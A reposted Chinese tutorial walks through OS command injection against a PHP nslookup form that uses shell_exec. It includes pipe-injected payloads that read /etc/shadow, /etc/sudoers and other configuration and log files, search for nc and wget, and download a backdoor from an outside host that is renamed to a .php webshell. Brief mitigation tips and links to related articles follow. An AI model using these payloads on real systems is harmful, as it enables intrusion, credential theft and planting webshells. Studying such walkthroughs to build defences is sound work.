php防止post注入恶意代码,[方法分享]利用输入框进行恶意代码注入

最新推荐文章于 2024-02-09 22:30:46 发布
最新推荐文章于 2024-02-09 22:30:46 发布
阅读量523 收藏 1
点赞数 1
文章标签: php防止post注入恶意代码

恶意代码注入虽然不是一个新的技术,甚至与我们熟知的远程代码执行漏洞并无原理上的区别,但危害却是致命的。本文的场景独特,方法也挺有趣,希望对各位freebufer们有所启发。 闲话少说,现在让我们来看看下图:

这是一个提供查询DNS服务的网站接口,用户可以在输入框中键入IP或主机名来进行查询。 a73eeb95ec7597bbc22d4ff3ffa564c0.png 他的代码实现也并不复杂,如下:<?php

if (isset($_POST["dns-lookup-php-submit-button"])){

try{

if ($targethost_validated){

echo shell_exec(“nslookup ” . $targethost);

$LogHandler->writeToLog($conn, “Executed operating system command: nslookup ” .     $lTargetHostText);

}else{

echo ‘’;

}// end if ($targethost_validated){

}catch(Exception $e){

echo $CustomErrorHandler->FormatError($e, “Input: ” . $targethost);

}// end try

}// end if (isset($_POST))

?>

好了,现在我们试着查询一个IP 74.125.31.102 7dc4063a4f09b021d46b84e3d3987d4b.png 在之前的代码里,你们发现了shell_exec()函数了么?

那么现在你应该明白这个查询接口是怎么实现的了,即通过shell_exec(“nslookup ” . $targethost)来执行系统命令,非常之简单。 下面我们会开始想方设法注入恶意代码 LINUX下"&&"可以用来连接命令,";"是命令分隔符。现在,我们会用echo命令来进行一些尝试,而我个人更倾向于使用"|"(管道符)而不是"&&",具体原因下面会讲到。| echo ‘hello’

57d19d9aa1465d2c4d6325705c3f5427.png 我们执行上面这条命令,其实与在终端下执行nslookup | echo ‘hello’效果是一样的。 d815de46284001fd0f6d5ce7364dec21.png 我为什么会使用管道符"|"而不是"&&"呢?下图会给你解释。 785923fa4a4569fd4eb80699377a0339.png 接下来我们试图获得更多的服务器信息。因为我们之前使用了命令uname -a,我们已经能够识别系统信息,比如Linux kernel release 3.0.0-1,网络接点的主机名是projectX,操作系统是GNU/Linux等等...

我们来查看这台服务器使用了哪种linux:| cat /etc/issue

| cat /etc/*-release

| cat /etc/lsb-release

| cat /etc/redhat-release

901e60beb2aea0ba98f440c1c4f30909.png 哈,这是一个BackBox,是笔者最爱的一款linux发行版:) 来看看我们在哪个目录下:| pwd ; ls -la

eae2fc17220f03deda07990c9cc02ba1.png 为了收集更多的信息,我们需要检查服务器上运行的服务| ps aux

| ps -ef

| top

| cat /etc/service

7b3308d11888d73d6982a556426794c3.png 为了能进一步发现系统中的弱点,以使用一些诸如exploit等方法进行渗透测试

下面的一些命令你兴许用得上:| cat /etc/environment

| cat /proc/self/environ | cat /etc/shadow | cat /etc/sudoers

| cat /etc/group

| cat /etc/security/group

| cat /etc/security/passwd

| cat /etc/security/user

| cat /etc/security/environ

| cat /etc/security/limits

| cat /usr/lib/security/mkuser.default

| cat /var/log/messages

| cat var/log/mysql.log

| cat /var/log/user.log

| cat /var/www/logs/error_log

| cat /etc/syslog.conf

| cat /etc/chttp.conf

| cat /etc/lighttpd.conf

| cat /etc/cups/cupsd.conf

| cat /etc/inetd.conf

| cat /etc/apache2/apache2.conf

| cat/var/log/apache2/error.log

| cat /etc/my.conf

| cat /etc/httpd/conf/httpd.conf

| cat /opt/lampp/etc/httpd.conf

| ls -aRl /etc/ | awk ‘$1 ~ /^.*r.*/

| cat /etc/resolv.conf

| cat /etc/sysconfig/network

| cat /etc/networks

| /sbin/ifconfig -a

| cat /etc/network/interfaces

| s -alh /var/spool/cron

| ls -al /etc/ | grep cron

| ls -al /etc/cron*

| cat /etc/cron*

| cat /etc/at.allow

| cat /etc/at.deny

| cat /etc/cron.allow

| cat /etc/cron.deny

| cat /etc/crontab

| cat /etc/anacrontab

| cat /var/spool/cron/crontabs/root

许多攻击者乐于在Linux服务器上留下后门,因此他们需要尝试哪些文件可以上传。| find / -name wget

| find / -name nc*

| find / -name netcat*

| find / -name tftp*

| find / -name ftp

我们随便wget一个txt| wget http://freebuf.com/thanks/unixhck.txt

成功了 77d7c042e690b167146d0dcbf3a9aa04.png 很好,既然如此,接下来我们自然是wget一个后门了| wget http://freebuf.com/backdoor.txt

重命名| cp backdoor.txt backdoor.php

查看我们的shell 9771a4eb70922ca8e7fe14662b827d0d.png 几条防止远程代码执行的TIPS: 1.禁止shell_exec()函数

2.如果你确实需要使用shell_exec()函数,建议使用escapeshellarg()和escapeshellcmd()做过滤。

3.使用WAF或mod_security等模块进行拦截过滤。 拓展阅读: A. Jay Turla 译:Thanks[Freebuf]

weixin_39859954
关注
php中$_GET与$_POST过滤sql注入方法
10-25
主要介绍了php中$_GET与$_POST过滤sql注入方法,包含了addslashes_deep函数与数组的操作方法,是非常具有实用价值的技巧,需要的朋友可以参考下
php注入(一)
qxs101307204的专栏
10-20 337
Php注入式(一)    1.函数:  Php的环境一般是apache+php+mysql,平常配置服务器一般是打开php.ini里的安全模式,将safe_mode设为on,还有就是将display_erors设为off,即关闭错误显示。还有一个非常重要的配置选项-----magic_quotes_gpc,高版本默认为on,以前的版本中默认为off。当magic_quotes_gpc为on的
php防止post注入,PHP程序中的sql语句防止POST数据注入问题
weixin_36256361的博客
03-21 189
/*本实例模仿用户登录时查询数据库的场景$sql="select * from user where username={$_POST['username']} and userpass=".md5($_POST['userpass']);mysql_real_escape_string($unescaped_string) 转义 SQL 语句中使用的字符串中的特殊字符,并考虑到连接的当前字符集本...
php防止post伪造,PHP伪造post请求
weixin_33448981的博客
03-20 302
function curlRequest($url, $postData=array(), $isPost=false){if (empty($url)) {return false;}$postData = http_build_query($postData);if(!$isPost){$url = $url.'?'.$postData;}// 初始化一个 cURL 对象$curl = cur...
利用输入框进行恶意代码注入
潜行
06-16 1662
http://www.freebuf.com/articles/4316.html
post注入过滤 php,php注入过滤客户提交$_GET 和$_POST参数_PHP教程
weixin_35786770的博客
03-12 119
/*** 安全范*/function Add_S($array){foreach($array as $key=>$value){if(!is_array($value)){$value = get_magic_quotes_gpc()?$value:addslashes($value);$array[$key]=filterHtml($value);}Else{Add_S($array[...
php防止post伪造,如何防止php中伪造跨站的请求
weixin_31162247的博客
03-20 260
伪造跨站请求一般都是很难范的,可以在用户不知情的情况下访问系统,一般攻击者都通过这种方式恶作剧,发spam信息,删除数据等,那么要如何防止php中伪造跨站的请求。伪造跨站请求介绍伪造跨站请求比较难以范,而且危害巨大,攻击者可以通过这种方式恶作剧,发spam信息,删除数据等等。这种攻击常见的表现形式有:伪造链接,引诱用户点击,或是让用户在不知情的情况下访问伪造表单,引诱用户提交。表单可以是隐藏的...
JS代码防止SQL注入方法(超简单)
10-22
本文主要介绍了如何使用JavaScript代码来防止SQL注入,这是为了保证Web应用的安全性,防止恶意用户通过输入特定的SQL语句来破坏数据库。文章从两个方面进行了说明,包括URL地址注入和输入文本框注入。 首先,...
PHP利用 strlen 防止SQL注入方法
攻击者通过在输入框中输入恶意的 SQL 代码,将其作为查询条件提交到后台数据库,进而执行恶意操作。 #### 1.1.1 SQL注入攻击的原理 SQL注入攻击通过构造特定的SQL语句段,使得执行程序错误地将这些可执行SQL代码...
php写的简易聊天室代码
12-18
- **表单提交与POST方法**:`<form>`标签使用`method="post"`将数据提交到服务器端。 - **HTML frameset**:`<frameset>` 元素用来划分浏览器窗口,创建多窗口布局。 - **变量与条件判断**:`@`符号用于抑制错误...
PHP防止post重复提交数据的简单例子
10-25
主要介绍了PHP防止post重复提交数据的简单例子,使用session记录一个数值的方法实现,需要的朋友可以参考下
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
这意味着,在输入框中提交的数据如果包含闭合符号,则可能被用来构造恶意SQL语句,实现SQL注入攻击。 3. **联合查询**:确定闭合方式后,可以通过在输入框中添加特定的SQL代码来触发联合查询。例如,在name字段中...
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 012-网络安全应急技术与实践(Web层-SQL注入
热门推荐
时光隧道
02-09 7万+
Web层攻击分析与应急响应演练是指对Web应用程序进行攻击分析,发现潜在的漏洞和安全威胁,并在发生安全事件时能够迅速做出应急响应措施的过程。进行Web层攻击分析是为了了解Web应用程序存在的弱点和漏洞,从而提前对其进行修复和加固。攻击分析可以包括对Web应用程序进行安全扫描、漏洞评估和渗透测试等活动,通过模拟真实攻击场景,发现可能被黑客利用的漏洞,如SQL注入、跨站点脚本攻击(XSS)、跨站点请求伪造(CSRF)等。攻击分析的目的是为了及早发现和修复潜在的安全问题,确保Web应用程序的安全性。
post注入过滤 php,PHPPOST参数过滤,防止SQL注入
weixin_30139213的博客
03-12 887
php整站sql注入程序,对于MySQL用户,可以使用函数mysql_real_escape_string( ),此函数需要注意编码问题,另外还有一个函数mysql_escape_string( )也可以使用,尽量使用为你的数据库设计的转义函数。如果没有,使用函数addslashes()是最终的比较好的方法。当所有用于建立一个SQL语句的数据被正确过滤和转义时,实际上也就避免了SQL注入的风险。...
php 防止跨域提交表单,跨域post 及 使用token防止csrf 攻击
weixin_39848953的博客
03-21 437
环境:后台使用的python - flask前台使用angular框架1.一个跨域post的样例:样例使用的为iframe,想要证明,在没有进行csrf御时,随意攻击者能够利用javascript发送 post 请求。从而简单的提交或获取数据资料;1.本地test.html页面POSTfunction test() {crossDomainPost({url: 'http://localhost...
PHP程序中的sql语句防止POST数据注入问题
weixin_33849942的博客
11-22 636
<?php /*本实例模仿用户登录时查询数据库的场景 $sql="select * from user where username={$_POST['username']} and userpass=".md5($_POST['userpass']); mysql_real_escape_string($unescaped_string) 转义...
php编辑框不允许输入空格,表单控制输入(不可输入空格.特殊字符)
weixin_35968185的博客
03-13 533
function ValidateSpecialCharacter() {var code;if (document.all) { //判断是否是IE浏览器code = window.event.keyCode;} else {code = arguments.callee.caller.arguments[0].which;}var character = String.fromCharCode...
php文本框防止js注入
chu_yubo的博客
03-15 1060
前台用texterea 输入数据,保存数据之前要进行转化: htmlspecialchars(addslashes($data)); 如果前端输出格式需要换行的话: 将\n 转化为&lt;br&gt; str_replace(" ", " ", str_replace("\n", "&lt;br&gt;", $data)); ...
什么是SQL注入并用代码演示
05-19
SQL注入是一种攻击技术,攻击者会利用应用程序未经过滤的用户输入来修改或篡改数据库中的数据。...为了防止SQL注入攻击,开发人员应该使用参数化查询或过滤输入来确保用户输入的数据不会执行任何恶意代码
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值